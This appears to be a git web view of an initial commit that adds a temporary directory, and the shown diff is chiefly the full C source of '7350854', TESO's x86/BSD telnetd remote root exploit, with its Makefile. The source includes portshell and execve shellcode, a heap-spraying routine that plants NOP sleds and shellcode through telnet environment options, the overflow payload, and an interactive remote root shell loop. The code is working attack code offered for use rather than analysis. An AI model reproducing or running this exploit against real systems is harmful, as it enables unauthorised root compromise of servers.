summaryrefslogtreecommitdiff
path: root/other/burneye2/tmp
diff options
context:
space:
mode:
authorRoot THC2026-02-24 12:42:47 +0000
committerRoot THC2026-02-24 12:42:47 +0000
commitc9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
treeaefc355416b561111819de159ccbd86c3004cf88 /other/burneye2/tmp
parent073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
initial
Diffstat (limited to 'other/burneye2/tmp')
-rw-r--r--other/burneye2/tmp/854/7350854-dietlibcbin0 -> 32313 bytes
-rw-r--r--other/burneye2/tmp/854/7350854-final-dietlibc.obin0 -> 39685 bytes
-rw-r--r--other/burneye2/tmp/854/7350854-final-glibc.obin0 -> 661666 bytes
-rw-r--r--other/burneye2/tmp/854/7350854-glibcbin0 -> 559779 bytes
-rw-r--r--other/burneye2/tmp/854/7350854.c877
-rw-r--r--other/burneye2/tmp/854/7350854.obin0 -> 11912 bytes
-rw-r--r--other/burneye2/tmp/854/Makefile28
-rw-r--r--other/burneye2/tmp/854/obj-dietstart/start.obin0 -> 628 bytes
-rw-r--r--other/burneye2/tmp/ed-final-dietlibc.obin0 -> 322411 bytes
-rw-r--r--other/burneye2/tmp/exectest/simple.c35
-rw-r--r--other/burneye2/tmp/exectest/simple.obin0 -> 1012 bytes
-rw-r--r--other/burneye2/tmp/funcptr/fptr.c24
-rw-r--r--other/burneye2/tmp/funcptr/fptr.obin0 -> 852 bytes
-rw-r--r--other/burneye2/tmp/iob/Makefile32
-rw-r--r--other/burneye2/tmp/iob/iobbin0 -> 47244 bytes
-rw-r--r--other/burneye2/tmp/iob/iob-dietlibcbin0 -> 20153 bytes
-rw-r--r--other/burneye2/tmp/iob/iob-final-dietlibc.obin0 -> 24745 bytes
-rw-r--r--other/burneye2/tmp/iob/iob-final-glibc.obin0 -> 519927 bytes
-rw-r--r--other/burneye2/tmp/iob/iob-glibcbin0 -> 441532 bytes
-rw-r--r--other/burneye2/tmp/iob/iob.c303
-rw-r--r--other/burneye2/tmp/iob/iob.obin0 -> 4400 bytes
-rw-r--r--other/burneye2/tmp/iob/pty.c315
-rw-r--r--other/burneye2/tmp/iob/pty.h95
-rw-r--r--other/burneye2/tmp/iob/pty.obin0 -> 2888 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/Makefile37
-rw-r--r--other/burneye2/tmp/ldistfp/common.c373
-rw-r--r--other/burneye2/tmp/ldistfp/common.h33
-rw-r--r--other/burneye2/tmp/ldistfp/common.obin0 -> 2924 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/fp.txt122
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp-dietlibcbin0 -> 40789 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp-final-dietlibc.obin0 -> 50749 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp-final-glibc.obin0 -> 667584 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp-glibcbin0 -> 564697 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp.c368
-rw-r--r--other/burneye2/tmp/ldistfp/ldistfp.obin0 -> 7304 bytes
-rw-r--r--other/burneye2/tmp/ldistfp/network.c712
-rw-r--r--other/burneye2/tmp/ldistfp/network.h287
-rw-r--r--other/burneye2/tmp/ldistfp/network.obin0 -> 7304 bytes
-rw-r--r--other/burneye2/tmp/linktest/Makefile21
-rw-r--r--other/burneye2/tmp/linktest/dummy.c6
-rw-r--r--other/burneye2/tmp/linktest/hello-final.obin0 -> 9461 bytes
-rw-r--r--other/burneye2/tmp/linktest/hello.c13
-rw-r--r--other/burneye2/tmp/linktest/hello.obin0 -> 896 bytes
-rw-r--r--other/burneye2/tmp/linktest/obj-dietstart/start.obin0 -> 628 bytes
-rw-r--r--other/burneye2/tmp/logout/7350logout-dietlibcbin0 -> 37310 bytes
-rw-r--r--other/burneye2/tmp/logout/7350logout-final-dietlibc.obin0 -> 47146 bytes
-rw-r--r--other/burneye2/tmp/logout/7350logout-final-glibc.obin0 -> 548025 bytes
-rw-r--r--other/burneye2/tmp/logout/7350logout-glibcbin0 -> 464698 bytes
-rw-r--r--other/burneye2/tmp/logout/7350logout.c1189
-rw-r--r--other/burneye2/tmp/logout/7350logout.obin0 -> 14860 bytes
-rw-r--r--other/burneye2/tmp/logout/Makefile30
-rw-r--r--other/burneye2/tmp/ssh-final-dietlibc.obin0 -> 2373391 bytes
-rw-r--r--other/burneye2/tmp/switchtab/Makefile19
-rw-r--r--other/burneye2/tmp/switchtab/switch.c39
-rw-r--r--other/burneye2/tmp/switchtab/switch.obin0 -> 932 bytes
-rw-r--r--other/burneye2/tmp/switchtab/switch_output.c41
-rw-r--r--other/burneye2/tmp/switchtab/switch_output.obin0 -> 1080 bytes
57 files changed, 4999 insertions, 0 deletions
diff --git a/other/burneye2/tmp/854/7350854-dietlibc b/other/burneye2/tmp/854/7350854-dietlibc
new file mode 100644
index 0000000..a9a50d6
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854-dietlibc
Binary files differ
diff --git a/other/burneye2/tmp/854/7350854-final-dietlibc.o b/other/burneye2/tmp/854/7350854-final-dietlibc.o
new file mode 100644
index 0000000..a9f31b5
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854-final-dietlibc.o
Binary files differ
diff --git a/other/burneye2/tmp/854/7350854-final-glibc.o b/other/burneye2/tmp/854/7350854-final-glibc.o
new file mode 100644
index 0000000..7efee82
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854-final-glibc.o
Binary files differ
diff --git a/other/burneye2/tmp/854/7350854-glibc b/other/burneye2/tmp/854/7350854-glibc
new file mode 100644
index 0000000..46a1c92
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854-glibc
Binary files differ
diff --git a/other/burneye2/tmp/854/7350854.c b/other/burneye2/tmp/854/7350854.c
new file mode 100644
index 0000000..95dd740
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854.c
@@ -0,0 +1,877 @@
1/* 7350854 - x86/bsd telnetd remote root exploit
2 *
3 * TESO CONFIDENTIAL - SOURCE MATERIALS
4 *
5 * This is unpublished proprietary source code of TESO Security.
6 *
7 * The contents of these coded instructions, statements and computer
8 * programs may not be disclosed to third parties, copied or duplicated in
9 * any form, in whole or in part, without the prior written permission of
10 * TESO Security. This includes especially the Bugtraq mailing list, the
11 * www.hack.co.za website and any public exploit archive.
12 *
13 * (C) COPYRIGHT TESO Security, 2001
14 * All Rights Reserved
15 *
16 *****************************************************************************
17 * bug found by scut 2001/06/09
18 * further research by smiler, zip, lorian and me.
19 * thanks to zip's cool friend for giving me a testbed to play on
20 *
21 * tested against: BSDI BSD/OS 4.1
22 * NetBSD 1.5
23 * FreeBSD 3.1
24 * FreeBSD 4.0-REL
25 * FreeBSD 4.2-REL
26 * FreeBSD 4.3-BETA
27 * FreeBSD 4.3-STABLE
28 * FreeBSD 4.3-RELEASE
29 *
30 */
31
32#define VERSION "0.0.7"
33
34#include <sys/types.h>
35#include <sys/time.h>
36#include <sys/socket.h>
37#include <netinet/in.h>
38#include <arpa/inet.h>
39#include <arpa/telnet.h>
40#include <netdb.h>
41#include <errno.h>
42#include <fcntl.h>
43#include <unistd.h>
44#include <stdio.h>
45#include <stdlib.h>
46#include <string.h>
47#include <time.h>
48
49
50/* global variables, uhhohh!
51 */
52int mode = 16;
53int num = 245;
54int pop = 31500; /* puts code at 0x08fdff0a */
55int bs = 1; /* buffer start */
56
57int num34 = 244;
58int pop34 = 71833; /* puts code at 0x0a0d08fe */
59int bs34 = 0;
60
61int walk; /* populator walker */
62int force = 0; /* force exploitation */
63int checkonly = 0; /* check telnetd only */
64
65
66void usage (char *progname);
67int xp_check (int fd);
68void xp_pop (int fd);
69void xp_shrinkwin (int fd);
70void xp_setenv (int fd, unsigned char *var, unsigned char *val);
71void xp (int fd);
72void shell (int sock);
73void hexdump (char *desc, unsigned char *data, unsigned int amount);
74
75/* imported from shellkit */
76unsigned long int random_get (unsigned long int low, unsigned long int high);
77void random_init (void);
78int bad (unsigned char u);
79int badstr (unsigned char *code, int code_len, unsigned char *bad,
80 int bad_len);
81unsigned long int x86_nop_rwreg (void);
82unsigned long int x86_nop_xfer (char *xferstr);
83unsigned int x86_nop (unsigned char *dest, unsigned int dest_len,
84 unsigned char *bad, int bad_len);
85
86#define BSET(dest, len, val, bw) { \
87 dest &= ~(((unsigned char) ~0) >> bw); /* clear lower bits */ \
88 dest |= val << (8 - bw - len); /* set value bits */ \
89 bw += len; \
90}
91
92/* imported from network.c */
93#define NET_CONNTIMEOUT 60
94int net_conntimeout = NET_CONNTIMEOUT;
95
96unsigned long int net_resolve (char *host);
97int net_connect (struct sockaddr_in *cs, char *server,
98 unsigned short int port, int sec);
99
100
101/* x86/bsd PIC portshell shellcode
102 * by lorian/teso
103 * port 0x4444 (might want to change it here)
104 */
105unsigned char x86_bsd_portshell[] =
106 "\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53"
107 "\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5"
108 /* ^^ ^^ port */
109 "\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a"
110 "\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a"
111 "\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73"
112 "\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd"
113 "\x80";
114
115/* x86/bsd PIC execve shellcode
116 * by lorian/teso
117 */
118unsigned char x86_bsd_execvesh[] =
119 "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68"
120 "\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80";
121
122/* x86/bsd(i)+solaris execve shellcode
123 * by lorian/teso
124 */
125unsigned char x86_bsd_compaexec[] =
126 "\xbf\xee\xee\xee\x08\xb8\xff\xf8\xff\x3c\xf7\xd0"
127 "\xfd\xab\x31\xc0\x99\xb0\x9a\xab\xfc\xab\xb0\x3b"
128 "\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
129 "\xe3\x52\x53\x89\xe1\x52\x51\x53\xff\xd7";
130
131
132unsigned char * shellcode = x86_bsd_compaexec;
133
134
135#define COL 55
136
137
138void
139usage (char *progname)
140{
141 fprintf (stderr, "usage: %s [-n <num>] [-c] [-f] <ip>\n\n", progname);
142 fprintf (stderr, "-n num\tnumber of populators, for testing purposes\n"
143 "-c\tcheck exploitability only, do not exploit\n"
144 "-f\tforce mode, override check results\n\n");
145 fprintf (stderr, "WARNING: this is no easy exploit, we have to get things tightly aligned and\n"
146 "send 16/34mb of traffic to the remote telnet daemon. it might not be able to\n"
147 "take that, or it will take very long for it (> 1h). beware.\n\n");
148
149 fprintf (stderr, "tested:\tFreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE \n"
150 "\tNetBSD 1.5\n"
151 "\tBSDI BSD/OS 4.1\n\n");
152
153 exit (EXIT_FAILURE);
154}
155
156int
157main (int argc, char *argv[])
158{
159 char c;
160 char * progname;
161 char * dest;
162 int i, j, fd,
163 dots = 0;
164 int popc;
165 struct timeval start,
166 cur;
167 unsigned long long int g_pct, /* gaussian percentage */
168 g_all; /* gaussian overall */
169
170
171 fprintf (stderr, "7350854 - x86/bsd telnetd remote root\n"
172 "by zip, lorian, smiler and scut.\n\n");
173
174 progname = argv[0];
175 if (argc < 2)
176 usage (progname);
177
178
179 while ((c = getopt (argc, argv, "n:cf")) != EOF) {
180 switch (c) {
181 case 'n':
182 num = atoi (optarg);
183 break;
184 case 'c':
185 checkonly = 1;
186 break;
187 case 'f':
188 force = 1;
189 break;
190 default:
191 usage (progname);
192 break;
193 }
194 }
195
196 dest = argv[argc - 1];
197 if (dest[0] == '-')
198 usage (progname);
199
200 fd = net_connect (NULL, dest, 23, 20);
201 if (fd <= 0) {
202 fprintf (stderr, "failed to connect\n");
203 exit (EXIT_FAILURE);
204 }
205
206 random_init ();
207
208 if (xp_check (fd) == 0 && force == 0) {
209 printf ("aborting\n");
210#ifndef DEBUG
211 exit (EXIT_FAILURE);
212#endif
213 }
214 close (fd);
215
216 if (checkonly)
217 exit (EXIT_SUCCESS);
218
219 fd = net_connect (NULL, dest, 23, 20);
220 if (fd <= 0) {
221 fprintf (stderr, "failed to connect the second time\n");
222 exit (EXIT_FAILURE);
223 }
224
225 printf ("\n#############################################################################\n\n");
226 printf ("ok baby, times are rough, we send %dmb traffic to the remote\n"
227 "telnet daemon process, it will spill badly. but then, there is no\n"
228 "other way, sorry...\n\n", mode);
229
230#ifdef DEBUG
231 getchar ();
232#endif
233 printf ("## setting populators to populate heap address space\n");
234
235 g_all = ((unsigned long long int)(pop / 2)) *
236 ((unsigned long long int)(pop + 1));
237 g_pct = 0;
238
239 printf ("## number of setenvs (dots / network): %d\n", pop);
240 printf ("## number of walks (percentage / cpu): %Lu\n", g_all);
241 printf ("##\n");
242 printf ("## the percentage is more realistic than the dots ;)\n");
243 printf ("\n");
244 printf ("percent |");
245
246 popc = pop / COL;
247 for (i = pop / popc ; i >= 0 ; --i)
248 printf ("-");
249 printf ("| ETA |\n");
250
251 gettimeofday (&start, NULL);
252
253 for (walk = 0 ; walk < pop ; ++walk) {
254 xp_pop (fd);
255
256 g_pct += walk;
257
258 if (walk % popc == 0)
259 dots += 1;
260
261 if (walk % 200 == 0) {
262 int pct;
263 float pct_f;
264 unsigned long int diff;
265
266 pct = (int) ((g_pct * 100) / g_all);
267 pct_f = g_pct * 100;
268 pct_f /= (float) g_all;
269
270 /* calculate difference not caring about accuracy */
271 gettimeofday (&cur, NULL);
272 diff = cur.tv_sec - start.tv_sec;
273
274 printf ((pct == 100) ? "\r%3.2f%% |" : ((pct / 10) ?
275 "\r %2.2f%% |" : "\r %1.2f%% |"), pct_f);
276 for (j = 0 ; j < dots ; ++j)
277 printf (".");
278 for ( ; j <= COL ; ++j)
279 printf (" ");
280
281 if (pct != 0) {
282 diff = (int) ((((float)(100 - pct_f)) /
283 (float) pct_f) * diff);
284 printf ("| %02lu:%02lu:%02lu |",
285 diff / 3600, (diff % 3600) / 60,
286 diff % 60);
287 } else {
288 printf ("| --:--:-- |");
289 }
290
291 fflush (stdout);
292 }
293 }
294 printf ("\n\n");
295
296 printf ("## sleeping for 10 seconds to let the process recover\n");
297 sleep (10);
298
299#ifdef DEBUG
300 getchar ();
301#endif
302 /* return into 0x08feff0a */
303 xp (fd);
304 sleep (1);
305
306 printf ("## ok, you should now have a root shell\n");
307 printf ("## as always, after hard times, there is a reward...\n");
308 printf ("\n\ncommand: ");
309 fflush (stdout);
310
311 shell (fd);
312
313 exit (EXIT_SUCCESS);
314}
315
316
317void
318xp (int fd)
319{
320 int n;
321 unsigned char buf[2048];
322
323
324 /* basic overflow */
325 for (n = bs ; n < sizeof (buf) ; ++n)
326 buf[n] = (n - bs) % 2 ? '\xf6' : '\xff';
327
328 /* some nifty alignment */
329 buf[0] = '\xff'; /* IAC */
330 buf[1] = '\xf5'; /* AO */
331
332 if (mode == 16) {
333 buf[2] = '\xff'; /* IAC */
334 buf[3] = '\xfb'; /* WILL */
335 buf[4] = '\x26'; /* ENCRYPTION */
336 }
337
338 /* force 0x08feff0a as return */
339 buf[num++] = '\xff';
340 buf[num++] = '\xfb';
341 buf[num++] = '\x08';
342
343 /* and the output_encrypt overwrite action, yay! */
344 buf[num++] = '\xff';
345 buf[num++] = '\xf6';
346
347 /* XXX: should not fail here, though we should better loop and check */
348 n = send (fd, buf, num, 0);
349 if (n != num) {
350 perror ("xp:send");
351 }
352}
353
354
355#ifdef INSANE_MIND
356
357void
358xp_shrinkwin (int fd)
359{
360 int n;
361 int iobc;
362 int p = 0;
363 unsigned char buf[2048];
364 char c;
365 int val;
366 int len;
367
368 for (n = 0 ; n < sizeof (buf) ; ++n)
369 buf[n] = n % 2 ? '\xf6' : '\xff';
370
371 len = sizeof (val);
372 getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len);
373 printf ("SO_SNDLOWAT = %d\n", val);
374 val = 1;
375 printf ("setsockopt: %s\n",
376 setsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, sizeof(val)) ?
377 "FAILED" : "SUCCESS");
378 val = 1234;
379 getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len);
380 printf ("SO_SNDLOWAT = %d\n", val);
381
382 getchar();
383 while (1) {
384 if (p > 105)
385 c = getchar();
386 if (c == 'r') {
387 getchar();
388 read (fd, &buf[1024], 384);
389 } else if (c == 'o') {
390 getchar();
391 send (fd, "7", 1, MSG_OOB);
392 } else if (c != 'r') {
393 usleep(100000);
394 n = send (fd, buf, 112, 0);
395 ioctl (fd, FIONREAD, &iobc);
396 len = sizeof (val);
397 getsockopt (fd, SOL_SOCKET, SO_RCVBUF, &val, &len);
398 printf ("%02d. send: %d local: %d/%d (%d left)\n",
399 ++p, n, iobc, val, val - iobc);
400 }
401 }
402}
403#endif
404
405
406/* xp_pop - populator function
407 *
408 * causes remote telnet daemon to setenv() variables with our content, populating
409 * the heap with shellcode. this will get us more nopspace and place our shellcode
410 * where the nice addresses are, that we can create by writing telnet option
411 * strings.
412 *
413 * XXX: there seems to be a maximum size for the environment value you can set,
414 * which is 510. we use 496 bytes for nopspace and shellcode therefore.
415 * should work, rather similar to tsig tcp/malloc exploitation. -sc
416 */
417
418void
419xp_pop (int fd)
420{
421 unsigned char var[16];
422 unsigned char storebuf[496];
423 sprintf (var, "%06x", walk);
424#ifdef DEBUG
425 memset (storebuf, '\xcc', sizeof (storebuf));
426#else
427/* memset (storebuf, '\x90', sizeof (storebuf)); */
428 x86_nop (storebuf, sizeof (storebuf), "\x00\x01\x02\x03\xff", 5);
429 memcpy (storebuf + sizeof (storebuf) - strlen (shellcode) - 1,
430 shellcode, strlen (shellcode));
431#endif
432 storebuf[sizeof (storebuf) - 1] = '\0';
433
434 xp_setenv (fd, var, storebuf);
435}
436
437
438void
439xp_setenv (int fd, unsigned char *var, unsigned char *val)
440{
441 int n = 0;
442 unsigned char buf[2048];
443
444 buf[n++] = IAC;
445 buf[n++] = SB;
446 buf[n++] = TELOPT_NEW_ENVIRON;
447 buf[n++] = TELQUAL_IS;
448 buf[n++] = ENV_USERVAR;
449
450 /* should not contain < 0x04 */
451 while (*var) {
452 if (*var == IAC)
453 buf[n++] = *var;
454 buf[n++] = *var++;
455 }
456 buf[n++] = NEW_ENV_VALUE;
457 while (*val) {
458 if (*val == IAC)
459 buf[n++] = *val;
460 buf[n++] = *val++;
461 }
462 buf[n++] = IAC;
463 buf[n++] = SE;
464
465 if (send (fd, buf, n, 0) != n) {
466 perror ("xp_setenv:send");
467 exit (EXIT_FAILURE);
468 }
469}
470
471
472int
473xp_check (int fd)
474{
475 int n;
476 unsigned int expect_len = 15;
477 unsigned char expected[] =
478 "\x0d\x0a\x5b\x59\x65\x73\x5d\x0d\x0a\xff\xfe\x08\xff\xfd\x26";
479 /* \r \n [ Y e s ] \r \n IAC DONT 08 IAC DO 26*/
480 unsigned int additional_len = 8;
481 unsigned char additional[] =
482 "\xff\xfa\x26\x01\x01\x02\xff\xf0";
483 /*IAC SB ENC ........... IAC SE */
484
485 unsigned char buf[128];
486
487 read (fd, buf, sizeof (buf));
488
489 n = 0;
490 buf[n++] = IAC; /* 0xff */
491 buf[n++] = AYT; /* 0xf6 */
492
493 buf[n++] = IAC; /* 0xff */
494 buf[n++] = WILL; /* 0xfb */
495 buf[n++] = TELOPT_NAOL; /* 0x08 */
496
497 buf[n++] = IAC; /* 0xff */
498 buf[n++] = WILL; /* 0xfb */
499 buf[n++] = TELOPT_ENCRYPT; /* 0x26 */
500
501#ifdef DEBUG
502 hexdump ("check send buffer", buf, n);
503#endif
504 if (send (fd, buf, n, 0) != n) {
505 perror ("xp_check:send");
506 exit (EXIT_FAILURE);
507 }
508
509 n = read (fd, buf, sizeof (buf));
510#ifdef DEBUG
511 hexdump ("check recv buffer", buf, n);
512#endif
513
514 if (memcmp (buf, expected, expect_len) == 0) {
515 if (memcmp (buf+expect_len, additional, additional_len) == 0) {
516 mode = 16;
517 } else {
518 mode = 34;
519 bs = bs34;
520 }
521 printf ("check: PASSED, using %dmb mode\n", mode);
522
523 return (1);
524 }
525
526 printf ("check: FAILED\n");
527
528 return (0);
529}
530
531
532void
533shell (int sock)
534{
535 int l;
536 char buf[512];
537 fd_set rfds;
538
539
540 while (1) {
541 FD_SET (0, &rfds);
542 FD_SET (sock, &rfds);
543
544 select (sock + 1, &rfds, NULL, NULL, NULL);
545 if (FD_ISSET (0, &rfds)) {
546 l = read (0, buf, sizeof (buf));
547 if (l <= 0) {
548 perror ("read user");
549 exit (EXIT_FAILURE);
550 }
551 write (sock, buf, l);
552 }
553
554 if (FD_ISSET (sock, &rfds)) {
555 l = read (sock, buf, sizeof (buf));
556 if (l <= 0) {
557 perror ("read remote");
558 exit (EXIT_FAILURE);
559 }
560 write (1, buf, l);
561 }
562 }
563}
564
565
566/* ripped from zodiac */
567void
568hexdump (char *desc, unsigned char *data, unsigned int amount)
569{
570 unsigned int dp, p; /* data pointer */
571 const char trans[] =
572 "................................ !\"#$%&'()*+,-./0123456789"
573 ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
574 "nopqrstuvwxyz{|}~...................................."
575 "....................................................."
576 "........................................";
577
578
579 printf ("/* %s, %u bytes */\n", desc, amount);
580
581 for (dp = 1; dp <= amount; dp++) {
582 fprintf (stderr, "%02x ", data[dp-1]);
583 if ((dp % 8) == 0)
584 fprintf (stderr, " ");
585 if ((dp % 16) == 0) {
586 fprintf (stderr, "| ");
587 p = dp;
588 for (dp -= 16; dp < p; dp++)
589 fprintf (stderr, "%c", trans[data[dp]]);
590 fflush (stderr);
591 fprintf (stderr, "\n");
592 }
593 fflush (stderr);
594 }
595 if ((amount % 16) != 0) {
596 p = dp = 16 - (amount % 16);
597 for (dp = p; dp > 0; dp--) {
598 fprintf (stderr, " ");
599 if (((dp % 8) == 0) && (p != 8))
600 fprintf (stderr, " ");
601 fflush (stderr);
602 }
603 fprintf (stderr, " | ");
604 for (dp = (amount - (16 - p)); dp < amount; dp++)
605 fprintf (stderr, "%c", trans[data[dp]]);
606 fflush (stderr);
607 }
608 fprintf (stderr, "\n");
609
610 return;
611}
612
613
614
615unsigned long int
616net_resolve (char *host)
617{
618 long i;
619 struct hostent *he;
620
621 i = inet_addr(host);
622 if (i == -1) {
623 he = gethostbyname(host);
624 if (he == NULL) {
625 return (0);
626 } else {
627 return (*(unsigned long *) he->h_addr);
628 }
629 }
630 return (i);
631}
632
633
634int
635net_connect (struct sockaddr_in *cs, char *server,
636 unsigned short int port, int sec)
637{
638 int n,
639 len,
640 error,
641 flags;
642 int fd;
643 struct timeval tv;
644 fd_set rset, wset;
645 struct sockaddr_in csa;
646
647 if (cs == NULL)
648 cs = &csa;
649
650 /* first allocate a socket */
651 cs->sin_family = AF_INET;
652 cs->sin_port = htons (port);
653 fd = socket (cs->sin_family, SOCK_STREAM, 0);
654 if (fd == -1)
655 return (-1);
656
657 if (!(cs->sin_addr.s_addr = net_resolve (server))) {
658 close (fd);
659 return (-1);
660 }
661
662 flags = fcntl (fd, F_GETFL, 0);
663 if (flags == -1) {
664 close (fd);
665 return (-1);
666 }
667 n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
668 if (n == -1) {
669 close (fd);
670 return (-1);
671 }
672
673 error = 0;
674
675 n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
676 if (n < 0) {
677 if (errno != EINPROGRESS) {
678 close (fd);
679 return (-1);
680 }
681 }
682 if (n == 0)
683 goto done;
684
685 FD_ZERO(&rset);
686 FD_ZERO(&wset);
687 FD_SET(fd, &rset);
688 FD_SET(fd, &wset);
689 tv.tv_sec = sec;
690 tv.tv_usec = 0;
691
692 n = select(fd + 1, &rset, &wset, NULL, &tv);
693 if (n == 0) {
694 close(fd);
695 errno = ETIMEDOUT;
696 return (-1);
697 }
698 if (n == -1)
699 return (-1);
700
701 if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
702 if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
703 len = sizeof(error);
704 if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
705 errno = ETIMEDOUT;
706 return (-1);
707 }
708 if (error == 0) {
709 goto done;
710 } else {
711 errno = error;
712 return (-1);
713 }
714 }
715 } else
716 return (-1);
717
718done:
719 n = fcntl(fd, F_SETFL, flags);
720 if (n == -1)
721 return (-1);
722 return (fd);
723}
724
725
726/* imported from shellkit */
727
728unsigned long int
729random_get (unsigned long int low, unsigned long int high)
730{
731 unsigned long int val;
732
733 if (low > high) {
734 low ^= high;
735 high ^= low;
736 low ^= high;
737 }
738
739 val = (unsigned long int) random ();
740 val %= (high - low);
741 val += low;
742
743 return (val);
744}
745
746
747void
748random_init (void)
749{
750 srandom (time (NULL));
751}
752
753
754int
755bad (unsigned char u)
756{
757 if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
758 return (1);
759
760 return (0);
761}
762
763int
764badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len)
765{
766 int n;
767
768 for (code_len -= 1 ; code_len >= 0 ; --code_len) {
769 for (n = 0 ; n < bad_len ; ++n)
770 if (code[code_len] == bad[n])
771 return (1);
772 }
773
774 return (0);
775}
776
777unsigned long int
778x86_nop_rwreg (void)
779{
780 unsigned long int reg;
781
782 do {
783 reg = random_get (0, 7);
784 } while (reg == 4); /* 4 = $esp */
785
786 return (reg);
787}
788
789
790
791unsigned long int
792x86_nop_xfer (char *xferstr)
793{
794 int bw = 0; /* bitfield walker */
795 unsigned char tgt; /* resulting instruction */
796
797 /* in a valid xferstr we trust */
798 for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) {
799 switch (xferstr[0]) {
800 case ('0'):
801 BSET (tgt, 1, 0, bw);
802 break;
803 case ('1'):
804 BSET (tgt, 1, 1, bw);
805 break;
806 case ('r'):
807 BSET (tgt, 3, x86_nop_rwreg (), bw);
808 break;
809 case ('.'):
810 break; /* ignore */
811 default:
812 fprintf (stderr, "on steroids, huh?\n");
813 exit (EXIT_FAILURE);
814 break;
815 }
816 }
817
818 if (bw != 8) {
819 fprintf (stderr, "invalid bitwalker: bw = %d\n", bw);
820 exit (EXIT_FAILURE);
821 }
822
823 return (tgt);
824}
825
826
827unsigned int
828x86_nop (unsigned char *dest, unsigned int dest_len,
829 unsigned char *bad, int bad_len)
830{
831 int walk;
832 int bcount; /* bad counter */
833 char * xs;
834 char * xferstr[] = {
835 "0011.0111", /* aaa */
836 "0011.1111", /* aas */
837 "1001.1000", /* cbw */
838 "1001.1001", /* cdq */
839 "1111.1000", /* clc */
840 "1111.1100", /* cld */
841 "1111.0101", /* cmc */
842 "0010.0111", /* daa */
843 "0010.1111", /* das */
844 "0100.1r", /* dec <reg> */
845 "0100.0r", /* inc <reg> */
846 "1001.1111", /* lahf */
847 "1001.0000", /* nop */
848 "1111.1001", /* stc */
849 "1111.1101", /* std */
850 "1001.0r", /* xchg al, <reg> */
851 NULL,
852 };
853 unsigned char tgt;
854
855
856 for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) {
857 /* avoid endless loops on excessive badlisting */
858 for (bcount = 0 ; bcount < 16384 ; ++bcount) {
859 xs = xferstr[random_get (0, 15)];
860 tgt = x86_nop_xfer (xs);
861
862 dest[walk] = tgt;
863 if (badstr (&dest[walk], 1, bad, bad_len) == 0)
864 break;
865 }
866
867 /* should not happen */
868 if (bcount >= 16384) {
869 fprintf (stderr, "too much blacklisting, giving up...\n");
870 exit (EXIT_FAILURE);
871 }
872 }
873
874 return (walk);
875}
876
877
diff --git a/other/burneye2/tmp/854/7350854.o b/other/burneye2/tmp/854/7350854.o
new file mode 100644
index 0000000..53b6fd8
--- /dev/null
+++ b/other/burneye2/tmp/854/7350854.o
Binary files differ
diff --git a/other/burneye2/tmp/854/Makefile b/other/burneye2/tmp/854/Makefile
new file mode 100644
index 0000000..c2688cb
--- /dev/null
+++ b/other/burneye2/tmp/854/Makefile
@@ -0,0 +1,28 @@
1
2CC=gcc
3CFLAGS=-Os -nostdlib
4
5# 1. order of start.o important, -L/-l does not matter
6LIBS_DIET=/usr/lib/diet/lib-i386/start.o \
7 -L/usr/lib/diet/lib-i386 -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc
8# gcc --help -v 2>&1 |grep crt
9LIBS_GLIBC=/usr/lib/crt1.o /usr/lib/crti.o /usr/lib/gcc-lib/i386-linux/2.95.4/crtbegin.o \
10 -lpthread -lc -L/usr/lib/gcc-lib/i386-linux/2.95.4 -lgcc \
11 /usr/lib/gcc-lib/i386-linux/2.95.4/crtend.o /usr/lib/crtn.o
12
13all: 7350854
14
15clean:
16 rm -f *.o 7350854-glibc 7350854-dietlibc
17
187350854: 7350854-final-dietlibc.o 7350854-final-glibc.o
19 ld -o 7350854-dietlibc 7350854-final-dietlibc.o
20 ld -o 7350854-glibc 7350854-final-glibc.o
21
227350854-final-dietlibc.o: 7350854.c
23 $(CC) $(CFLAGS) -c -o 7350854.o 7350854.c
24 ld -r -d -o 7350854-final-dietlibc.o 7350854.o $(LIBS_DIET)
25
267350854-final-glibc.o: 7350854.c
27 $(CC) $(CFLAGS) -c -o 7350854.o 7350854.c
28 ld -r -d -o 7350854-final-glibc.o 7350854.o $(LIBS_GLIBC)
